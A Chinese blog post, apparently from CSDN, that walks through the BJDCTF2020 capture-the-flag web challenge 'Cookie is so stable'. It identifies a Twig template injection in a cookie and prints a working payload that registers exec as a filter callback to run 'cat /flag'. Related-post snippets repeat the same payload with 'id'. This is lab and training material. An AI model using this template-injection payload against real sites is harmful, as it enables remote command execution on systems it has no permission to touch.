[BJDCTF2020] web题-Cookie is so stable

最新推荐文章于 2024-06-13 07:36:50 发布
最新推荐文章于 2024-06-13 07:36:50 发布
阅读量263 收藏
点赞数
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/112018956
版权

在这里插入图片描述

酷炫的欢迎界面,有1个flag.php和hint.php
hint.php的页面元素发现了提示
在这里插入图片描述
去flag.php发现存在模板注入
在这里插入图片描述
然后提示说研究cookie,使用payload
payload:{{_self.env.registerUndefinedFilterCallback(“exec”)}}{{_self.env.getFilter(“cat /flag”)}};
在这里插入图片描述
flag:flag{985a0930-71c5-4a1a-9b7e-229400ecab55}

BROTHERYY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tiny-cookie:一个用于浏览器的小型 cookie 操作插件
05-31
如果您使用过 tiny-cookie,那么您可能会对感兴趣,这是一个专注于 Web 开发的函数集合。 安装 新产品管理: npm install tiny-cookie 用法 ES2015(推荐) // You can import all methods. import * as Cookies...
Java-Web简答.docx
11-24
Java-Web 简答 Java-Web 简答是一份涵盖 Java-Web 相关知识的库,涵盖了 JSP、Servlet、数据库等方面的知识。以下是对库中所涉及的知识点进行的详细解释: JSP 内置对象 JSP 中有多个内置对象,分别是: ...
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 691
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
[BJDCTF2020]Cookie is so stable
qq_52907838的博客
08-03 127
打开环境,除了主页面有两个页面,flag.php和hint.php。flag.php是一个输入框: 在hint.php的源代码中发现: 让我们看看cookies,那就随便输入看下cookies: 修改值随便尝试下,发现不是SQL注入也不是xss,那这时就想到可能是模板注入。 验证方式是输入{{7*7}},如果显示49,说明是Twig;如果显示7777777说明是jinja2, ...
[BJDCTF2020]Cookie is so stable1
最新发布
m0_73673698的博客
06-13 332
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开目,看到如下页面。
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1206
运用的知识点 SSTI注入 目 解 一开始看到目提示cookie 先抓一个包试试 没发现什么问,点开另一个网页 感觉是注入的目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
flask-session-cookie-manager:Flask会话Cookie解码器
02-05
# pacman -S flask-session-cookie-manager{3,2} 吉特 ArchLinux 两者python3 etn python2: $ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager # ...
js-cookie.js
03-31
js_cookie源码下载,js-cookie用于操作cookie,笔者是因为一开始不会弄,后来会整下来了,鉴于自身经历,故将其分享出来。
flask-session-cookie-manager
01-29
“flask-session-cookie-manager”指的是一个Python应用,它专门针对Flask框架,用于管理和操作session cookie。在Web开发中,session cookie是服务器用来跟踪用户状态的一种方式,特别是在无状态的HTTP协议上...
SVM支持向量机分类鸢尾花数据集iris及代码
09-30
SVM支持向量机分类鸢尾花数据集iris及代码,数据集有Excel、data、txt文件格式,代码有data、txt格式演示
第四十七——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 189
目地址:https://buuoj.cn/challenges 解思路 第一步:进入目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合目提示cookie,确定user有问 修改user值为:{{_self.env.register
【BUUCTF】[BJDCTF2020]Cookie is so stable
aoao331198的博客
04-30 228
flag页面比较容易看出来存在SSTI 看见有wp说是Twig模板注入,copy一下判断方法 尝试{{7*7}}, 返回49 尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板 不同的模板的攻击方式不同,贴一个好文章 一篇文章带你理解漏洞之 SSTI 漏洞 用PL {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")}} 但是在输入框.
js-cookie获取response.headers的set-cookie
05-30
在JavaScript中,可以使用js-cookie库来获取response.headers的set-cookie。js-cookie库提供了一个方便的方法来操作cookie,通过这个库,我们可以轻松地获取和设置cookie。使用这个库的方法如下: 1. 首先,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值